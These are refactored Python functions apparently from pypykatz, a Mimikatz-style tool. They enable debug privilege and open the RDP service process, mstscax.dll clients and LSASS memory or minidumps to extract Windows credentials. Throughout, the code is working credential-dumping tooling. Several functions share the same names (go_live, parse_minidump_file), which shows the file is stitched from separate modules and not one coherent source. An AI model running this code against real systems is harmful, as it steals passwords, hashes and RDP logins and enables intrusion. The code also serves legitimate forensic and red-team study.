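def go_live(pid=None, all_rdp=False):
    """Open live RDP-related processes and start an RDPCredParser on each.

    Windows only. When ``pid`` is given, only that process is parsed. Otherwise
    the process backing the ``TermService`` service is parsed and, when
    ``all_rdp`` is truthy, every process that has ``mstscax.dll`` loaded is
    parsed as well.

    Args:
        pid: process id to parse, or None to discover targets from the
            service list (and, optionally, from all running processes).
        all_rdp: additionally scan every process for a loaded ``mstscax.dll``.

    Returns:
        list of started RDPCredParser instances, one per opened target.

    Raises:
        Exception: when not running on Windows.
    """
    if platform.system() != 'Windows':
        raise Exception('Live parsing will only work on Windows')

    from pypykatz.commons.winapi.machine import LiveMachine
    from pypykatz.commons.winapi.constants import (
        PROCESS_VM_READ,
        PROCESS_VM_WRITE,
        PROCESS_VM_OPERATION,
        PROCESS_QUERY_INFORMATION,
        PROCESS_CREATE_THREAD,
    )
    from pypykatz.commons.readers.local.common.privileges import enable_debug_privilege
    from pypykatz.commons.readers.local.live_reader import LiveReader
    from pypykatz.commons.readers.local.process import Process

    # NOTE(review): VM_WRITE, VM_OPERATION and CREATE_THREAD exceed what a
    # read-only walk of the target's memory needs, and nothing in this function
    # writes to the target. Confirm RDPCredParser actually requires them; a
    # narrower mask is less risky for the target process and easier to
    # justify when the handle open shows up in process-access audit logs.
    req_access_rights = (
        PROCESS_VM_READ
        | PROCESS_VM_WRITE
        | PROCESS_VM_OPERATION
        | PROCESS_QUERY_INFORMATION
        | PROCESS_CREATE_THREAD
    )
    # Presumably enables the debug privilege for this process so that the
    # handle opens below succeed on protected processes — confirm in privileges.py.
    enable_debug_privilege()

    def _parser_for(process):
        # Wrap an opened process in a reader/sysinfo pair and a parser (not started yet).
        reader = LiveReader(process_handle=process.phandle)
        sysinfo = KatzSystemInfo.from_live_reader(reader)
        return RDPCredParser(process, reader.get_buffered_reader(), sysinfo)

    targets = []
    if pid is not None:
        process = Process(pid=pid, access=req_access_rights)
        # Return value intentionally unused; kept in case it populates state
        # the parser relies on — TODO confirm against Process.list_modules.
        process.list_modules()
        targets.append(_parser_for(process))
    else:
        machine = LiveMachine()
        # Loop variable renamed so it no longer shadows the `pid` parameter.
        for service_name, _display_name, service_pid in machine.list_services():
            if service_name == 'TermService':
                targets.append(_parser_for(Process(pid=service_pid, access=req_access_rights)))
        if all_rdp:
            for candidate_pid in machine.list_all_pids():
                try:
                    process = Process(pid=candidate_pid, access=req_access_rights)
                    if any('mstscax.dll' in module.name.lower() for module in process.list_modules()):
                        targets.append(_parser_for(process))
                except Exception as e:
                    # Best-effort sweep: processes that cannot be opened or have
                    # exited are expected here, so report and move on.
                    print(e)

    for target in targets:
        target.start()
    return targets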
def parse_memory_dump_rekall(filename, override_timestamp=None):
    """Run pypykatz over a memory image opened through a Rekall-backed reader.

    Args:
        filename: path of the memory image handed to RekallReader.from_memory_file.
        override_timestamp: optional timestamp forwarded unchanged to the reader.

    Returns:
        the started pypykatz instance.
    """
    from pypykatz.commons.readers.rekall.rekallreader import RekallReader

    rekall_reader = RekallReader.from_memory_file(filename, override_timestamp)
    system_info = KatzSystemInfo.from_rekallreader(rekall_reader)
    katz = pypykatz(rekall_reader, system_info)
    katz.start()
    return katz
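def go_rekall(session, override_timestamp=None, buildnumber=None, packages=None):
    """Run pypykatz against an existing Rekall session.

    Args:
        session: Rekall session forwarded to RekallReader.from_session.
        override_timestamp: optional timestamp forwarded to the reader.
        buildnumber: optional build number forwarded to the reader.
        packages: list of credential packages passed to ``start``; None
            selects ``['all']``. A fresh list is built on every call so the
            default can never be shared (or mutated) across calls.

    Returns:
        the started pypykatz instance.
    """
    from pypykatz.commons.readers.rekall.rekallreader import RekallReader

    if packages is None:
        packages = ['all']
    reader = RekallReader.from_session(session, override_timestamp, buildnumber)
    sysinfo = KatzSystemInfo.from_rekallreader(reader)
    mimi = pypykatz(reader, sysinfo)
    mimi.start(packages)
    return mimi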
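def go_live_phandle(lsass_process_handle, packages=None):
    """Run pypykatz over a live process through an already opened handle.

    Windows only.

    Args:
        lsass_process_handle: handle forwarded to ``LiveReader(lsass_process_handle=...)``.
        packages: list of credential packages passed to ``start``; None
            selects ``['all']`` (built fresh per call, never a shared default).

    Returns:
        the started pypykatz instance.

    Raises:
        Exception: when not running on Windows.
    """
    if platform.system() != 'Windows':
        raise Exception('Live parsing will only work on Windows')
    if packages is None:
        packages = ['all']

    from pypykatz.commons.readers.local.live_reader import LiveReader

    reader = LiveReader(lsass_process_handle=lsass_process_handle)
    sysinfo = KatzSystemInfo.from_live_reader(reader)
    mimi = pypykatz(reader.get_buffered_reader(), sysinfo)
    mimi.start(packages)
    return mimi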
def go_live():
    """Run pypykatz over the process that ``LiveReader()`` opens by default.

    Windows only. The default target is not visible here; the sibling
    ``go_live_phandle`` names its handle parameter ``lsass_process_handle``,
    which suggests LSASS — confirm in live_reader.py.

    Returns:
        the started pypykatz instance.

    Raises:
        Exception: when not running on Windows.
    """
    if platform.system() != 'Windows':
        raise Exception('Live parsing will only work on Windows')

    from pypykatz.commons.readers.local.live_reader import LiveReader

    live_reader = LiveReader()
    system_info = KatzSystemInfo.from_live_reader(live_reader)
    katz = pypykatz(live_reader.get_buffered_reader(), system_info)
    katz.start()
    return katz
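def parse_minidump_buffer(buff, packages=None):
    """Parse an LSASS minidump whose contents sit in an in-memory buffer.

    Args:
        buff: io.BytesIO object holding the minidump.
        packages: list of credential packages passed to ``start``; None
            selects ``['all']`` (built fresh per call, never a shared default).

    Returns:
        the started pypykatz instance.
    """
    if packages is None:
        packages = ['all']
    minidump = MinidumpFile.parse_buff(buff)
    reader = minidump.get_reader().get_buffered_reader()
    sysinfo = KatzSystemInfo.from_minidump(minidump)
    mimi = pypykatz(reader, sysinfo)
    mimi.start(packages)
    return mimi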
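def parse_minidump_bytes(data, packages=None):
    """Parse an LSASS minidump held as raw bytes.

    Args:
        data: the minidump contents; the original docstring requires a bytearray.
        packages: list of credential packages passed to ``start``; None
            selects ``['all']`` (built fresh per call, never a shared default).

    Returns:
        the started pypykatz instance.
    """
    if packages is None:
        packages = ['all']
    minidump = MinidumpFile.parse_bytes(data)
    reader = minidump.get_reader().get_buffered_reader()
    sysinfo = KatzSystemInfo.from_minidump(minidump)
    mimi = pypykatz(reader, sysinfo)
    mimi.start(packages)
    return mimi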
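async def parse_minidump_external(handle, packages=None, chunksize=10 * 1024):
    """Parse an LSASS minidump from a file-like object, asynchronously.

    The object only has to implement ``read``, ``seek`` and ``tell`` with the
    same parameters a regular file object takes.

    Args:
        handle: file-like object positioned on the minidump.
        packages: list of credential packages passed to ``start``; None
            selects ``['all']`` (built fresh per call, never a shared default).
        chunksize: chunk size handed to the buffered reader.

    Returns:
        the started apypykatz instance.
    """
    if packages is None:
        packages = ['all']
    minidump = await AMinidumpFile.parse_external(handle)
    reader = minidump.get_reader().get_buffered_reader(chunksize)
    sysinfo = KatzSystemInfo.from_minidump(minidump)
    mimi = apypykatz(reader, sysinfo)
    await mimi.start(packages)
    return mimi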
def parse_minidump_external(handle):
    """Parse an LSASS minidump from a file-like object.

    Any object works as long as it implements ``read``, ``seek`` and ``tell``
    with the same parameters a regular file object takes.

    Args:
        handle: file-like object positioned on the minidump.

    Returns:
        the started pypykatz instance.
    """
    dump = MinidumpFile.parse_external(handle)
    buffered = dump.get_reader().get_buffered_reader()
    system_info = KatzSystemInfo.from_minidump(dump)
    katz = pypykatz(buffered, system_info)
    katz.start()
    return katz
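def parse_minidump_file(filename, rdp_module, chunksize=10 * 1024):
    """Parse an LSASS minidump from disk and run the RDP credential parser on it.

    Args:
        filename: path of the minidump file.
        rdp_module: forwarded unchanged as RDPCredParser's fourth argument.
        chunksize: ``segment_chunk_size`` handed to the buffered reader.

    Returns:
        a one-element list holding the started RDPCredParser.

    Raises:
        Whatever MinidumpFile.parse or the reader raises, and whatever
        RDPCredParser raises while parsing; both are logged with their
        traceback before being re-raised.
    """
    try:
        minidump = MinidumpFile.parse(filename)
        reader = minidump.get_reader().get_buffered_reader(segment_chunk_size=chunksize)
        sysinfo = KatzSystemInfo.from_minidump(minidump)
    except Exception:
        logger.exception('Minidump parsing error!')
        raise  # bare raise keeps the original traceback intact
    try:
        mimi = RDPCredParser(None, reader, sysinfo, rdp_module)
        mimi.start()
    except Exception:
        # logger.exception rather than logger.info so the traceback is not lost,
        # matching how the minidump stage above reports failures.
        logger.exception('Credentials parsing error!')
        raise
    return [mimi]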
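async def parse_minidump_file(filename, packages=None, chunksize=10 * 1024):
    """Parse an LSASS minidump from disk and run apypykatz on it, asynchronously.

    Args:
        filename: path of the minidump file.
        packages: list of credential packages passed to ``start``; None
            selects ``['all']`` (built fresh per call, never a shared default).
        chunksize: chunk size handed to the buffered reader.

    Returns:
        the started apypykatz instance.

    Raises:
        Whatever AMinidumpFile.parse or the reader raises (logged with
        traceback first), and whatever ``start`` raises (basic info is logged
        via ``log_basic_info`` first).
    """
    if packages is None:
        packages = ['all']
    try:
        minidump = await AMinidumpFile.parse(filename)
        reader = minidump.get_reader().get_buffered_reader(chunksize)
        sysinfo = KatzSystemInfo.from_minidump(minidump)
    except Exception:
        logger.exception('Minidump parsing error!')
        raise  # bare raise keeps the original traceback intact
    # Constructed outside the try: if the constructor itself failed inside it,
    # `mimi` would be unbound and the except branch would raise
    # UnboundLocalError, hiding the real error.
    mimi = apypykatz(reader, sysinfo)
    try:
        await mimi.start(packages)
    except Exception:
        mimi.log_basic_info()
        raise
    return mimi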
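def parse_minidump_file(filename):
    """Parse an LSASS minidump from disk and run pypykatz on it.

    Args:
        filename: path of the minidump file.

    Returns:
        the started pypykatz instance.

    Raises:
        Whatever MinidumpFile.parse or the reader raises (logged with
        traceback first), and whatever ``start`` raises (basic info is logged
        via ``log_basic_info`` first).
    """
    try:
        minidump = MinidumpFile.parse(filename)
        reader = minidump.get_reader().get_buffered_reader()
        sysinfo = KatzSystemInfo.from_minidump(minidump)
    except Exception:
        logger.exception('Minidump parsing error!')
        raise  # bare raise keeps the original traceback intact
    # Constructed outside the try: if the constructor itself failed inside it,
    # `mimi` would be unbound and the except branch would raise
    # UnboundLocalError, hiding the real error.
    mimi = pypykatz(reader, sysinfo)
    try:
        mimi.start()
    except Exception:
        mimi.log_basic_info()
        raise
    return mimi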
def get_sysinfo(self):
    """Populate ``self.sysinfo`` from the VMM configuration of the live target.

    Fills in the Windows build number (VmmPy_ConfigGet), the file time that
    PEGetFileTime reports for ``self.process_pid``/``self.process_name``
    (stored as ``msv_dll_timestamp``), and the architecture derived from the
    core system type.
    """
    # Assigned first so a partially filled object stays on self even if a
    # later lookup raises, exactly as before.
    self.sysinfo = KatzSystemInfo()
    info = self.sysinfo

    info.buildnumber = VmmPy_ConfigGet(VMMDLL_OPT_WIN_VERSION_BUILD)
    info.msv_dll_timestamp = int(PEGetFileTime(self.process_pid, self.process_name))

    # Only the 64-bit Windows value is recognised; every other core system
    # value is treated as X86 — presumably the only other value seen here, confirm.
    core_system = VmmPy_ConfigGet(VMMPY_OPT_CORE_SYSTEM)
    info.architecture = (
        KatzSystemArchitecture.X64
        if core_system == VMMPY_SYSTEM_WINDOWS_X64
        else KatzSystemArchitecture.X86
    )